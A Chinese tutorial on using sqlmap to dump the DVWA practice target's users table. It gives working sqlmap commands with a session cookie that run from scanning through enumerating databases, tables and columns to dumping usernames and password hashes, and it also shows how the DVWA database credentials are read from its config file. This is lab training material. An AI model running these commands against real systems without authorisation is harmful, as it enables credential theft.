sqlmap DVWA脱库
本文描述使用sqlmap对DVWA靶机进行脱库
一、先登录靶机,查看目标靶机的用户名密码
1、先查询dvwa靶机的登录代码文件
进入OWASP系统的/var/www/dvwa目录,查询login.php登录文件可知,存在sql注入,如下:
2、进入/var/www/dvwa/config目录,查看config.inc.php文件得到dvwa数据库的用户名和密码:
3、连接dvwa数据库:mysql -u dvwa -p,密码为dvwa,得到dvwa库和users表,查询出表中的用户名和密码
到这里我们得到了目标靶机的用户名以及对应密码的md5值
二、使用sqlmap进行爆库
1、打开dvwa-->sql injection,把级别调到low
抓包,得到requests url和cookie(slmap扫描的时候会重定向到认证的页面,拿到cookie,才能在这个页面进行持续扫描)
2、扫描当前页面
sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' -- cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7'
3、获取数据库名称
sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' --dbs -v 0
4、获取表明
sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' -D dvwa --tables
5、获取列名
sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' -D dvwa -T users --columns
6、脱库
sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' --dump -D dvwa -T users -C 'user,password'
保存在用户名密码保存在users.csv里
sqlmap DVWA脱库相关推荐
- 【安全测试学习】基于bWAPP靶场,使用sqlmap实现脱库实战
以上仅是个人学习安全测试整理,如用于其它用途责任自负!
- C#.NET 大型企业信息化系统集成快速开发平台 4.2 版本 - 防止脱库、防止篡改数据...
一些无关紧要的数据.被脱库了什么的, 也没啥的,但是有些比较重要的数据被脱库了,虽然可能没严重的损失,但是会很丢人一样的,被爆出脱库了什么的,总是会比较难为情的,说实话也是蛮丢人的,能多防范就多防范, ...
- 21 | 哈希算法(上):如何防止数据库中的用户信息被脱库?
问题:对于用户信息中的密码,你会如何存储用户密码?仅仅 MD5 加密一下存储就够了吗?--哈希算法 什么是哈希算法 哈希算法的定义和原理:将任意长度的二进制值串映射为固定长度的二进制值串,这个映射的规 ...
- 你的个人信息是如何被盗走的?MySQL脱库,脱库的原理,怎么脱库,脱库的步骤,一库三表六字段
「作者主页」:士别三日wyx 「作者简介」:CSDN top200.阿里云博客专家.华为云享专家.网络安全领域优质创作者 脱库 一.什么是脱库 二.默认数据库 三.一库三表六字段 四.脱库步骤 1)爆 ...
- Nacos出现重大安全漏洞,开源项目险遭脱库
前言 大家好,我是陌溪 昨天陌溪在蘑菇博客交流群和群里的小伙伴进行了一场比较激烈的讨论,主要是关于 Nacos 中一个绕过安全认证直接获取微服务项目的配置文件的 安全漏洞. 截止到昨天为止,该 iss ...
- data_structure_and_algorithm -- 哈希算法(上):如何防止数据库中的用户被脱库?
最近写的文章有点杂,看上去东一点西一点,最后会在博客目录中捋顺的. 今天主要看一下哈希算法的应用,主要参考:前谷歌工程师王争的课程,感兴趣可以通过下面方式微信扫码购买: 还记得 2011 年 CSDN ...
- 哈希算法(一)---如何防止数据库中的用户信息被脱库?
目录 什么是哈希算法? 应用一:安全加密 应用二:唯一标识 应用三:数据校验 应用四:散列函数 解答开篇 内容小结 课后思考 还记得 2011 年 CSDN 的"脱库"事件吗?当时 ...
- 由脱库攻击谈口令字段的加密策略——密码泄露事件杂谈之一
(之前已经在首页上挂了一天了,放在这里只是给自己做个备份,先说明一下,看过的大仙就不必浪费时间了,由于当时文章写的非常仓促,有不周之处希望批评指正.) 我不得不惨痛地写在前面的是,这是一个安全崩盘的时 ...
- 聊聊数据安全,mybatis 如何有效预防脱库
今天讲一讲数据的安全问题,我们本篇不从DBA.网络架构层面来讲述数据安全,这部分有很专业的架构和云上产品来解决,本篇重点从开发人员角度讲述如何避免数据安全的漏洞. 我相信大部分人都看到过这样的新闻,某 ...
- 数据安全防脱库解决方案信息泄密根源
本文讲的是数据安全防"脱库"解决方案信息泄密根源,近日不断有黑客陆续在互联网上公开提供国内多家知名网站部分用户数据库下载,国内外媒体频繁报道,影响恶劣,引起社会广泛关注.其中涉及到 ...
最新文章
- 计算机与材料成型与控制方面的应用,广东科技学院
- 公司行为(Corporate Actions)
- 螺丝上的十字磨没了_十字起子和无限下拉菜单
- Django抛错不存在(DoesNotExist)
- LeetCode 1486. 数组异或操作
- SHELL实战day12
- CodeSmith应用(四):实现选择路径对话框
- [MongoDB] MongoDB的安装以及问题
- go语言 gosched
- Petya and Exam 模拟
- SSM整合时IDE: File is included in 4 contexts
- [转]我不敢!⋯⋯⋯⋯致所有拼搏的年輕人。
- understand 4 for linux register key code 随意、任性拥有。。。。
- Python04,变量与赋值
- eeprom和编程器固件 k2_关于k2的一个非常诡异的情况,涉及原厂固件比第三方如老毛子网速快,穿墙,eeprom等...
- 三菱plc指令dediv_三菱PLC指令[]学习指导书.ppt
- 浏览器html中加入word,web网页中加载word
- Python 多行注释
- Python-S9-Day123——爬虫两示例
- 常微分方程各种类型方程表格汇总